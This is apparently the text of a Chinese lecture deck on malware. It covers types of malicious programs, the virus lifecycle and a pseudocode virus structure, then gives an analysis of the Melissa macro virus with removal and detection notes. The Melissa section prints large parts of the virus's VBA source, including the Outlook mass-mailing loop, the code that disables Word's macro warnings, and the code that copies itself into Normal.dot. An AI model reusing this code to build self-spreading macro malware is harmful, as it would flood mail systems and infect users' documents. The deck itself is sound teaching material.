网络安全理论与技术06-恶意软件

1计算机病毒概述2概述恶意程序的概念、分类后门、逻辑炸弹、特洛伊木马病毒的生命周期病毒的结构病毒的分类3恶意程序的概念恶意程序通常是指带有攻击意图所编写的一段程序4恶意程序的分类图10.1(p327,inbook)提供了一个全面的分类软件的威胁，或恶意程序。56恶意程序恶意软件可以分为两类:一类需要驻留在宿主程序中，而另一类则独立于宿主程序。第一类软件实质上是一些必须依赖于某些实际的应用程序、实用程序或者系统程序才可以运行的程序段。后一类软件是可以被操作系统调度并运行的独立程序。7恶意程序可以通过是否可以自身复制来区分这些恶意软件的类别。不可自复制的恶意软件是通过触发而被激活的程序或程序段。8恶意程序可自复制的的恶意软件包括程序段(virus)或独立程序(worm,bacterium)

。当这类程序或程序段执行的时候，可能会产生自身的一个或多个副本，这些副本在合适的时机将在当前系统或其它系统中被激活。9后门后门是程序的秘密入口点，它使得知情者可以绕开正常的安全访问机制而直接访问程序。10后门后门已被用于合法程序员调试和测试程序。当程序开发者在设计一个包含认证机制的应用或者一个要求用户输入多个不同的值才能够运行的程序时，为避开这些繁琐的认证机制以便调试顺利进行，程序设计者往往会设置这样的后门。11后门当后门被某些恶意者利用，作为获取未经授权的访问权限的工具时，它便成为一种安全威胁。通过操作系统实现对后门的控制很困难。应对后门的安全措施必须重点关注程序开发过程和软件更新活动。12逻辑炸弹逻辑炸弹是最早出现的程序威胁类型之一。他出现的时间甚至早于病毒和蠕虫。逻辑炸弹实际上是嵌入到某些合法程序中的代码段，当遇到某些特定条件时，它便会“爆发”。13逻辑炸弹可以引爆逻辑炸弹的条件很多，比如某些特定文件的存在或缺失，某个特定的日期或星期的到来或者是某个特定用户运行的应用程序等。14逻辑炸弹逻辑炸弹一旦被引爆，将会修改或删除文件中的数据甚至整个文件，这将引起系统关机或者其他危害。例如，CIH病毒(导致了BIOS的毁坏)每年的4月26日发作，或每月的26日。15特洛伊木马特洛伊木马是一种有用或者表面上有用的程序或命令过程。它包含隐秘代码段，一旦被调用，将会执行一些不希望或有害的功能。16特洛伊木马例如，一个木马程序表面上只是以某种格式列出文件，但当其他用户执行该程序之后，攻击者就可以得到该文件的相关信息。如盗号木马(QQ、银行、网游)17计算机病毒的定义计算机病毒产生的动机（原因）作为一种文化（hacker）病毒编制技术学习。恶作剧。产生于个别人的报复心理。用于版权保护（江民公司）。用于特殊目的（军事、计算机防病毒公司）。18计算机病毒的定义计算机病毒的前身只不过是程序员闲来无事而编写的趣味程序；后来，才发展出了诸如破坏文件、修改系统参数、干扰计算机的正常工作等的恶性病毒“病毒”一词的正式出现在1985年3月份的“科学美国人”里。19计算机病毒的定义“计算机病毒”与医学上的“病毒”不同，它不是天然存在的，是某些人利用计算机软、硬件所固有的脆弱性，编制的具有特殊功能的程序。20计算机病毒的定义“计算机病毒”为什么叫做病毒？原因是，它与生物医学上的病毒同样有传染和破坏的特性，因此这一名词是由生物医学上的“病毒”概念引申而来。21FredCohen定义：

计算机病毒是一种程序，他用修改其它程序的方法将自身的精确拷贝或者可能演化的拷贝插入其它程序，从而感染其它程序。计算机病毒的定义22从广义上讲，凡能够引起计算机故障，破坏计算机数据的程序统称为计算机病毒。依据此定义，诸如恶意代码，蠕虫,木马等均可称为计算机病毒。在国内，专家和研究者对计算机病毒也做过不尽相同的定义，但一直没有公认的明确定义。计算机病毒的定义23《中华人民共和国计算机信息系统安全保护条例》，第二十八条中明确指出：计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。此定义具有法律性、权威性。标准定义（中国）：

24病毒的性质病毒是通过修改其他程序而“感染”它们的软件；

这种修改操作包括复制可以继续感染其他程序的病毒程序。25病毒的性质病毒可以做任何其他程序可以做的事情。与普通程序相比，病毒唯一不同的是，它将自身附到其它程序上，并且在宿主程序运行的同时秘密执行其自身功能。一旦病毒执行，它可以实现病毒设计者所设计的任何功能，比如删除文件或程序。26病毒的特性破坏性传染性隐蔽性寄生性触发（潜伏）性27病毒的危害情况28病毒的生命周期病毒的生命周期包含以下四个阶段：

1,休眠阶段（Dormantphase）：在这个阶段中，病毒不执行操作，而是等待被某些事件激活，这些事件包括一个特定日期、其他程序或文件的出现、磁盘容量超出了某些限度等。并非所有病毒都有这一阶段。29病毒的生命周期2.传播阶段（Propagationphase）：病毒将与其自身完全相同的

副本植入其他程序或磁盘的某些系统区域。每个被感染的程序中都将包含病毒的一个副本，并且这些副本会自动进入传播阶段，继续向其他程序传播病毒。30病毒的生命周期3.触发阶段（Triggeringphase：病毒在这一阶段被激活以执行其预先设计的功能。和睡眠阶段类似，病毒进入触发阶段可以由很多系统事件引起，其中包括病毒副本复制的数量达到某个数值。31病毒的生命周期4.执行阶段（Executionphase）：

在这个阶段中，病毒将实现其预期的功能。这些功能可能无害，比如在屏幕上显示一条消息；也可能是破坏的，比如对程序或数据文件造成损坏等。32病毒结构33病毒结构/*引导功能模块*/{将病毒程序寄生于宿主程序中；加载计算机程序；病毒程序随其宿主程序的运行进入系统；}{传染功能模块；}{破坏功能模块；}34病毒结构main(){调用引导功能模块；A：do{寻找传染对象；

if(传染条件不满足) gotoA；}while(满足传染条件)；

调用传染功能模块；while(满足破坏条件){激活病毒程序；

调用破坏功能模块；}

运行宿主源程序；

if(不关机)

gotoA；关机；}35病毒结构病毒可以放置在可执行文件的前端，也可以放置在该文件的后端，还可以以其它形式嵌入到可执行文件中。

病毒执行的关键是在调用被感染的程序时，将首先执行病毒代码，之后才执行程序的源代码。36病毒结构图10.2是对病毒结构的一个非常通用的描述

[COHE94]。在这个例子中，病毒代码V设置在感染程序的前端。它还被作为程序的入口，当调用程序时，首先执行病毒程序。3738病毒结构像前面所描述的这种病毒很容易被检测到，因为感染后的程序比感染前的程序长。防止这种检测方法的手段是对可执行文件进行压缩，使得无论该程序是否被感染，它的长度都是相同的。39病毒结构图10.3(p331,inbook)[COHE94]表示了一般情况下这种方法所要求的逻辑。这个病毒中的关键部分已经用数字标出。另外，图10.4[COHE94]说明了这一操作过程。404142病毒结构假设程序P1

被病毒CV感染。当调用程序的时候，控制权由病毒掌管，并按以下步骤操作：1，对发现的每个未被感染的文件P2，病毒首先压缩该文件，生成比原始文件小的P2’，P2’与P2在文件大小上的差异刚好是一个病毒的大小。2，病毒将其副本放置在该压缩程序前端。43病毒结构3，将最初被感染的文件的压缩版P1’

解压缩。4，执行解压缩后的原始程序。梅丽莎病毒特点计算机病毒与防治课程小组“梅丽莎”病毒于1999年3月爆发，它伪装成一封来自朋友或同事的“重要信息”电子邮件。用户打开邮件后，病毒会让受感染的电脑向外发送50封携毒邮件。尽管这种病毒不会删除电脑系统文件，但它引发的大量电子邮件会阻塞电子邮件服务器，使之瘫痪。1999年4月1日，在美国在线的协助下，美国政府将史密斯捉拿归案。梅丽莎病毒简介梅丽莎病毒特点计算机病毒与防治课程小组2002年5月7日美国联邦法院判决这个病毒的制造者入狱20个月和附加处罚，这是美国第一次对重要的电脑病毒制造者进行严厉惩罚。在联邦法庭上，控辩双方均认定“梅丽莎”病毒造成的损失超过8000万美元，编制这个病毒的史密斯承认，他从AOL盗取了一个帐户名，并利用这个帐户到处传播宏病毒，最后他表示认罪，认为设计电脑病毒是一个“巨大的错误”，自己的行为“不道德”。病毒制造者梅丽莎病毒特点计算机病毒与防治课程小组该病毒通过电子邮件的方式传播,当用户打开附件中的“list.doc”文件时，将立刻中招。病毒的代码使用Word的VBA语言编写,开创了此类病毒的先河,如同病毒作者的猖狂之言“It’sanewage!”。病毒通过对注册表进行修改,并调用Outlook发送含有病毒的邮件,进行快速传播。由于该病毒发送的邮件的发件人是用户熟悉的,因此往往被很多人忽视。同时,该病毒会自动重复以上的动作,由此引起连锁反应,在短时间内,造成邮件服务器的大量阻塞,严重影响正常网络通讯。该病毒可感染Word97、Word2000的Doc文件,并修改通用模板Normal.dot,使受害者几乎永无“脱离苦海”之时。梅丽莎病毒特点梅丽莎病毒源码分析计算机病毒与防治课程小组梅丽莎病毒巧妙地利用了VBA技术对注册表、Word模板和邮件系统进行了猛烈地攻击。1、梅丽莎病毒被激活后,将修改注册表中的“HKEY_CURRENT_USER\Software\Microsoft\office\”键,并增加项“Melissa？”,赋值为“…byKwyjibo”(病毒作者的大名)，并将此作为是否已感染病毒的标志。病毒中相关操作的核心代码如下所示：

’读取注册表项的内容,进行判断IfSystem.PrivateProfileString(“”,“HKEY_CURRENT_USER\Software\Microsoft\office\”，“Melissa？”)<>“…byKwyjibo”Then……’其它操作代码’设置感染标志System.PrivateProfileString(“HKEY_CURRENT_USER\Software\Microsoft\office\”，“Melissa？”)=“…byKwyjibo”EndIf

梅丽莎病毒源码分析计算机病毒与防治课程小组2、发送邮件在Outlook程序启动的情况下,梅丽莎病毒将自动给地址簿中的成员(前50名)发送邮件,主题为“ImportantMessageFrom”,用户名“<user>”为Word软件的用户名,邮件的正文为“Hereisthatdocumentyouaskedfor…don’tshowanyoneelse;

一)”,邮件的附件为一个文件名为“list.doc”的带毒文件。为了实现七述功能,病毒利用获取了地址薄中所有的邮件地址,并发送内嵌病毒代码的邮件,达到了疯狂传播的目的。病毒中相关操作的核心代码如下所示：梅丽莎病毒源码分析计算机病毒与防治课程小组DimUngaDasOutlook,DasMapiName,BreakUmoffASlice’创建Outlook应用程序实例对象SetUngaDasOutlook=CreateObject(“Outlook.Application”)’获取MAPI对象SetDasMapiName=UngaDasOutlook.GetNameSpace(“MAPI”)IfUngaDasOutlook=”Outlook”ThenDasMapiName.Logon“profile”,”password”’遍历地址薄,进行邮件发送操作Fory=1ToDasMapiName.AddressLists.CountSetAddyBook=DasMapiName.AddressLists(y)X=1SetBreakUmoffASlice=UngaDasOutlook.CreateItem(0)Foroo=1ToAddyBook.AddressEntries.Count’获取第n个收件人地址Peep=AddyBook.AddressEntries(x)’加入收件人地址BreakUmoffASlice.Recipients.AddPeepX=x+1梅丽莎病毒源码分析计算机病毒与防治课程小组Ifx>50Thenoo=AddyBook.AddressEntries.CountNextoo’设置邮件的主题BreakUmoffASlice.Subject=”ImportantMessageFrom”&Application.UserName’设置邮件的正文BreakUmoffASlice.Body=”Hereisthatdocumentyouaskedfor…don’tshowanyoneelse:-)”’加入邮件的附件BreakUmoffASlice.Attachments.AddActiveDocument.FullName’发送邮件BreakUmoffASlice.SendNexty’断开连接DasMapiName.LogoffPeep=””EndIf梅丽莎病毒源码分析计算机病毒与防治课程小组3、修改Word模版梅丽莎病毒激活后,将感染Word97和Word2000的文档并修改通用模板Normal.dot,使感染后的Word运行时“宏”菜单项不能使用,并且导致Word软件对文件转换、打开带有宏的文件、Normal.dot遭到修改后都不会出现警告,使病毒的魔爪“天衣无缝”。最后,将病毒自身的代码和所做的设置修改,利用一个很高超的方法一同写入Normal.dot之中,使用户以后打开Word时病毒反复发作。病毒中相关操作的核心代码如下所示：梅丽莎病毒源码分析计算机病毒与防治课程小组’使“宏”工具栏的“安全”项无效CommandBars(“Macro”).Controls(“Security…”).Enabled=False’使“工具”菜单栏的“宏”项无效CommandBars(“Tools”).Controls(“Macro”).Enabled=False’将“0”(1-1)值赋于ConfirmConversions属性,使“文件转换”对话框不显示Options.ConfirmConversions=(1-1)’将,“0”（1-1）值赋于VirusProtection属性,使“宏警告”对话框不显示Options.VirusProtection=(1-1)’将“0”(1-1)值赋于SaveNormalPrompt属性,使Normal.dot被修改后不显示警告对话框Options.SaveNormalPrompt=(1-1)’获取当前文档的VBA工程的第1个模块名称SetADI1=ActiveDocument.VBProject.VBComponents.Item(1)’获取Normal.dot的VBA工程的第1个模块名称SetNTI1=NormalTemplate.VBProject.VBComponents.Item(1)NTCL=NTI1.CodeModule.CountOfLinesADCL=ADI1.CodeModule.CountOfLinesBGN=2梅丽莎病毒源码分析计算机病毒与防治课程小组‘如果当前文档未感染IfADI1.Name<>”Melissa”Then’修改VBA工程的第1个模块名称为“Melissa”IfADCL>0ThenADI1.CodeModule.DeleteLines1,ADCLSetToInfect=ADI1ADI1.Name=“Melissa“DoAD=TrueEndIf’如果Normal.dot未感染IfNTI1.Name<>“Melissa”Then’修改VBA工程的第1个模块名称为“Melissa“IfNTCL>0ThenNTI1.CodeModule.DeleteLines1,NTCLSetToInfect=NTI1NTI1.Name=”Melissa”DoNT=TrueEndIf梅丽莎病毒源码分析计算机病毒与防治课程小组’如果都已感染,跳转执行以后的命令IfDoNT<>TrueAndDoAD<>TrueThenGoToCY’开始感染Normal.dotIfDoNT=TrueThenDoWhileADI1.CodeModule.Lines(1,1)=””ADI1.CodeModule.DeleteLines1LoopToInfect.CodeModule.AddFromString(“PrivateSubDocument_Close（）”)DoWhileADI1.CodeModule.Lines(BGN,1)<>“”ToInfect.CodeModule.InsertLinesBGN,ADI1.CodeModule.Lines(BGN,1)BGN=BGN+1LoopEndIf梅丽莎病毒源码分析计算机病毒与防治课程小组IfDoAD=TrueThen’开始感染当前文档DoWhileNTI1.CodeModule.Lines(1,1)=””NTI1.CodeModule.DeleteLines1LoopToInfect.CodeModule.AddFromString(“PrivateSubDocument.Open()”)DoWhileNTI1.CodeModule.Lines(BGN,1)<>””ToInfect.CodeModule.InsertLinesBGN,NTI1.CodeModule.Lines(BGN,1)BGN=BGN+1LoopEndIfCYA:’保存被修改的当前文档和Normal.dotIfNTCL<>0AndADCL=0And(InStr(1,ActiveDocument.Name,”Document”)=False)ThenActiveDocument.SaveAsFileName=ActiveDocument.FullNameElseIf(InStr(1,ActiveDocument.Name,”Document”)<>False)ThenActiveDocument.Saved=TrueEndIfEnfIf梅丽莎病毒主要行为分析计算机病毒与防治课程小组梅丽莎病毒源码梅丽莎病毒对注册表的修改梅丽莎病毒发出的邮件梅丽莎病毒手工清除计算机病毒与防治课程小组感染了梅丽莎病毒后，同样可以用最新的防治计算机病毒的软件来查杀，如果手头上一时没有病毒防治软件的话，对感染宏病毒的WORD文件也可以通过手工操作的方法来处理。（1）在Administrator用户下，打开我的电脑,选择“工具→文件夹选项→查看”,选中“显示系统文件夹的内容”和“显示所有文件和文件夹”选项,取消“隐藏受保护的操作系统文件”选项,确定后搜索NORMAL.DOT文件。注意在搜索时要将“更多高级选项”下的“搜索系统文件夹”和“搜索隐藏的文件和文件夹”都勾上,待搜索完毕后,将找到的NORMAL.DOT文件全部删除,并清空回收站.（2）打开注册表编辑器，搜索所有键名称为“Melissa”的项，全部删除。熊猫烧香病毒手工清除计算机病毒与防治课程小组（3）删除所有染毒WORD文件，如果需要保留某个文件中的内容，选中该文件,单击鼠标右键选择“打开方式”,在程序选择框选择“写字板”打开文件,然后另存为DOC文件。或者在高版本的WORD软件中打开文件清除里面的宏处理。（4）最后新建一个Word空文档并打开,倘若没有报错而且Word中各功能项可用,则Word可以正常使用了。计算机病毒的检测方法计算机病毒进行传染，必然会留下痕迹。检测计算机病毒，就是要到病毒寄生场所去检查，发现异常情况，并进而验明“正身”，确认计算机病毒的存在。病毒静态时存储于磁盘中，激活时驻留在内存中。因此对计算机病毒的检测分为对内存的检测和对磁盘的检测。

一般对磁盘进行病毒检测时，要求内存中不带病毒，因为某些计算机病毒会向检测者报告假情况。例如4096病毒在内存中时，查看被它感染的文件长度时，不会发现该文件的长度已发生变化，而当在内存中没有病毒时，才会发现文件长度已经增加了4096字节。

又如引导区型的巴基斯坦大脑病毒，当它被激活在内存中时，检查引导区时看不到病毒程序而只看到正常的引导扇区。病毒检测的原理主要基于下列几种方法：